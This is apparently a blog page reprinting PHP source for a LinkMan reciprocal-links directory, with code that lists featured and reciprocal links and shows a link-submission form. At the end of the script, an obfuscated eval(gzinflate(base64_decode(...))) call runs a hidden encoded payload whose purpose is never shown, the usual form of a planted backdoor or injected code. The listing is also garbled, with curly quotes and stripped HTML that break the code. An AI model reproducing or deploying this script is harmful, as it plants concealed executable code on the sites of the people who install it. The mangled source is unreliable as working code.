Feed on
Posts
Comments

Links

define('IN_SCRIPT',1);
require('../linkman/settings.php');

require_once('../linkman/header.txt');

if ($settings['show_form'])
{
?>

Submit your website

}

$lines = file($settings['linkfile']);

$print_featured = 0;
$first = 1;
$i = 0;

foreach ($lines as $thisline)
{
$thisline=trim($thisline);
if (!empty($thisline))
{
$i++;
list($name,$email,$title,$url,$recurl,$description,$featured,$pr)=explode($settings['delimiter'],$thisline);

$show_url = $settings['show_url'] ? ' - ’.$url.’‘ : ”;

if ($settings['show_pr'] == 1)
{
if (empty($pr)) {$pr=0;}
$pr_code = ‘ Google PageRank: '.$pr.'/10 

‘;
}
else
{
$pr_code = ”;
}

if ($settings['show_thumbshots'])
{
$thumb_code = ‘ Thumbnail 

‘;
}
else
{
$thumb_code = ”;
}

if ($featured == 1)
{

if ($print_featured == 0)
{
$print_featured = 1;
$first = 0;
echo ‘

Featured links

‘;
}

$url = ($settings['clean'] != 1) ? $url : ‘go.php?url=’.rawurlencode($url);
$nofollow = ($settings['use_nofollow']==1) ? ‘rel=”nofollow”‘ : ”;

echo ‘

‘.$thumb_code.’
‘.$pr_code.’

‘;
}
else
{
if ($settings['show_thumbshots']!=1)
{
$thumb_code = ”;
}

if ($print_featured == 1)
{
$print_featured = 0;
$first = 1;
echo ‘

‘.$title.’‘.$show_url.’
‘.$description.’
 

‘;
}

if ($first == 1)
{
$first = 0;
echo ‘

Reciprocal links

‘;
}

$url = ($settings['clean'] == 0) ? $url : ‘go.php?url=’.rawurlencode($url);
$nofollow = $settings['use_nofollow'] ? ‘rel=”nofollow”‘ : ”;

echo ‘

‘.$thumb_code.’
‘.$pr_code.’

‘;
}
}
}

/* Close the table if at least one link is printed out */
if ($i)
{
echo ‘

‘.$title.’‘.$show_url.’
‘.$description.’

‘;
}
else
{
echo ‘

No links yet!

‘;
}

if ($settings['show_form'])
{
if ($i < $settings['max_links'])
{
?>

 
Submit your website

» Step 1: Add our link to your website

Website URL: <a href=""></a> -

» Step 2: Submit your link

All fields are required. Please finish Step 1 before submitting this form.

Your name:
E-mail:
Website title:
Website URL:
URL with reciprocal link:

Website description:

} // End if $settings['max_links'] < $i
else
{
?>

 
Submit your website

Unfortunately we are not accepting any new links at the moment.

}
} // End if $settings['show_form']

eval(gzinflate(base64_decode('BcFHkqNIAADA50x36IApEBAbc8BIGOER9jKBKRDC+4LXbybc0/
anuuq+bNMV/mTpAu/UvwLmQwF//gj5U1kmjed5yaEAwhZPUOdXmzxMp/NMTY7fdkCLqVQZ0kgzxOLm5G
gpYmSSX+v9Ve6JdDE6S3r2Qlg2MdSVMuDJsw931ZxV5k65jBGslD+5nBh9w7QnnO3iAmY8ms4bJTg+fQ
CuOvQjyhg6P1iLIGrPFGcwzWsd6LKlQ9Cx6a4PKYIQVfKUc06YJTUXKRPyn1qiZtc2wwjq5AkXyUutWK
lWsDyGNIryzRK1otGnWtfZLMeiFQyzcXbrffUaq5yVocOE4XqsFBp6F4Cg13rfX/jAvMNQE7KJ8PFLK6
M82N6ybyPLMWbDTK7yoEIBDxvE5IVAQYm43KjFzkuA0fHER1/EFB92N32zK9sIyXZGbg/u2QnB98Mk+A
0jpftLJyr08PaqVMUE+8apLfFcOalrEzj0Jxg+y8QEK+tQeCyrHcE+9x0QaPbt3XIdszvo0B4DpuS5Hs
uHsYiQky8jxpCW1FcPnKEcXezn1O2Twqy1LRNpq1+QtKStYB/FxsC3y3v8Vb8OvM+k8+UpKEjYHVfB2h
P2U/yuWuAi4mHIKrmJLcnOH8SEMbHRdFrKQkFIUTIi+cWN7ZKD+XUGPh6/4pW2AylrSdoWTdDsET/gR/
dWhXU0mnOJstPcWJ/anVPPbhmrPwRtrdM4F/iUIdxOrnurYYdWuIzhBnnOiBjvc8q3FJQvy4rTt4dvCM
iVKnfLMX4YHVo0pwbKAamn96UECxW7Nxk4PW4ISY03bA0EYnazy57DSnAB9u+f39/f//4H')));
?>

Popularity: 1% [?]

If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!